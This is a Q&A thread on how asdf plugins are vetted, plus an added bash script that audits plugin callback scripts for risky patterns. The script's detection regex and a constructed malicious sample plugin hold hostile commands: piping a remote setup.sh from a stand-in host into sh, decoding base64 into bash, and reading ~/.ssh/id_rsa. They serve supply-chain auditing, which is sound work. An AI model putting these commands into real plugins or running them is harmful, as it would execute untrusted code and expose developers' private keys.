Vetting process for onboarding asdf plugins?


Does anyone know if there is a vetting procedure for inclusion of new plugins for asdf? I'd like to recommend use of asdf, but our security people want to know how hard it would be for someone to add a plugin to install malicious software.

Or is there a better place to ask?


1 answer


asdf plugins are never included in asdf-vm core. When you install asdf on a machine it by default includes no plugins. All plugins are installed manually from an external source. The safest way of installing a plugin is via the explicit asdf plugin-add <name> <url> syntax. For example, to install the Ruby plugin maintained by the asdf core team run the following command:

$ asdf plugin add ruby https://github.com/asdf-vm/asdf-ruby.git

How hard would it be for someone to create a plugin to install malicious software? Plugins are just Git repos with callback scripts in them. It would be as easy as publishing a Git repo to GitHub with malicious software. The challenge for an attacker would be convincing developers to install it. This is similar to most open source software today. Creating something bad is easy; getting developers to use it is tricky.

There is a sort of "plugin repo" - https://github.com/asdf-vm/asdf-plugins - but using anything in it still requires you to run asdf plugin-add <plugin name>. We are working on phasing this out, as it appears to be "official" but in reality is not maintained by the core team. In the future only the explicit asdf plugin-add <name> <url> syntax will work. Additionally, in the future we'll have explicit versioning for plugins, so upgrades to plugins will be easier to track.

Nothing prevents you from auditing open-source asdf plugins yourself. If your team has a few plugins they'd like to use, auditing the code manually or via a security tool should be easy to do.
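Since a plugin is just a Git checkout of callback scripts, the "audit it yourself" advice above can be turned into a repeatable check. The script below is an added example, not code from the original answer or from the asdf project: it greps every callback under a plugin's bin/ directory for shapes a fetch-and-unpack plugin has no reason to use (piping curl or wget into a shell, decoding base64 into a shell, eval, sudo, touching ~/.ssh or /etc), and records the commit the checkout is at so that a later `asdf plugin update <name>` can be diffed against the audited revision. The two sample plugins it inspects are constructed inline for the demonstration; the bin/install layout, the ASDF_* environment variables and the `$ASDF_DATA_DIR/plugins/<name>` location are assumptions about how asdf lays plugins out.

```shell
#!/usr/bin/env bash
# Added example (not from the asdf project): audit the callback scripts of an
# asdf plugin checkout before approving it, and record the exact commit so a
# later update can be diffed against the audited revision.
# It works on any directory, e.g. one made with `git clone <url> <dir>` or the
# checkout asdf keeps under "$ASDF_DATA_DIR/plugins/<name>" (default
# ~/.asdf/plugins/<name>; that layout is an assumption about the installation).
set -eu

# Patterns that warrant a human look. Assumption: a plugin whose job is to
# download a release tarball and unpack it has no business using these.
RISKY_RE='curl[^|]*[|][[:space:]]*(ba)?sh|wget[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|eval[[:space:]]|sudo[[:space:]]|~/\.ssh|/etc/'

# audit_plugin DIR: prints "file:line:content" for every risky line found in
# any script under DIR/bin. Always exits 0; use audit_count for a verdict.
audit_plugin() {
    local dir="$1" f
    for f in "$dir"/bin/*; do
        [ -f "$f" ] || continue
        grep -HnE "$RISKY_RE" "$f" || true
    done
}

# audit_count DIR: number of risky lines (0 means nothing matched).
audit_count() {
    audit_plugin "$1" | grep -c . || true
}

# record_plugin_ref DIR: the commit the checkout is at, so the approved
# revision can be written down and compared later with
# `git -C DIR diff <recorded-sha>..HEAD` after `asdf plugin update <name>`.
record_plugin_ref() {
    if [ -d "$1/.git" ]; then
        git -C "$1" rev-parse HEAD
    else
        echo "(not a git checkout)"
    fi
}

# make_sample_plugin DIR BODY: constructed sample plugin with a single
# bin/install callback (for this demonstration only, not a real asdf plugin).
make_sample_plugin() {
    mkdir -p "$1/bin"
    printf '%s\n' "$2" > "$1/bin/install"
    chmod +x "$1/bin/install"
}

SAMPLE_ROOT=$(mktemp -d)
CLEAN_PLUGIN="$SAMPLE_ROOT/clean"
SHADY_PLUGIN="$SAMPLE_ROOT/shady"

# Constructed well-behaved callback: download the release for the requested
# version into the download path and unpack it into the install path.
make_sample_plugin "$CLEAN_PLUGIN" '#!/usr/bin/env bash
set -euo pipefail
url="https://example.invalid/tool-${ASDF_INSTALL_VERSION}.tar.gz"
curl -fsSL "$url" -o "$ASDF_DOWNLOAD_PATH/tool.tar.gz"
tar -xzf "$ASDF_DOWNLOAD_PATH/tool.tar.gz" -C "$ASDF_INSTALL_PATH" --strip-components=1'

# Constructed malicious-looking callback: runs remote code instead of
# unpacking a release, smuggles a second stage through base64, reads a key.
make_sample_plugin "$SHADY_PLUGIN" '#!/usr/bin/env bash
# fetch an installer and run it
# second stage is hidden from casual review
curl -fsSL https://example.invalid/setup.sh | sh
echo "ZWNobyBoaQo=" | base64 -d | bash
cat ~/.ssh/id_rsa 2>/dev/null'

echo "clean plugin findings: $(audit_count "$CLEAN_PLUGIN")"
echo "shady plugin findings: $(audit_count "$SHADY_PLUGIN")"
audit_plugin "$SHADY_PLUGIN"
echo "shady plugin ref: $(record_plugin_ref "$SHADY_PLUGIN")"
```

A zero count is not a clean bill of health, only the absence of the listed shapes; the point of printing the matching lines is to give a reviewer a short list to read rather than the whole plugin. Pair the recorded commit with the plugin URL from `asdf plugin list --urls` in whatever approval record your security team keeps, so that a future update can be reviewed as a diff instead of from scratch.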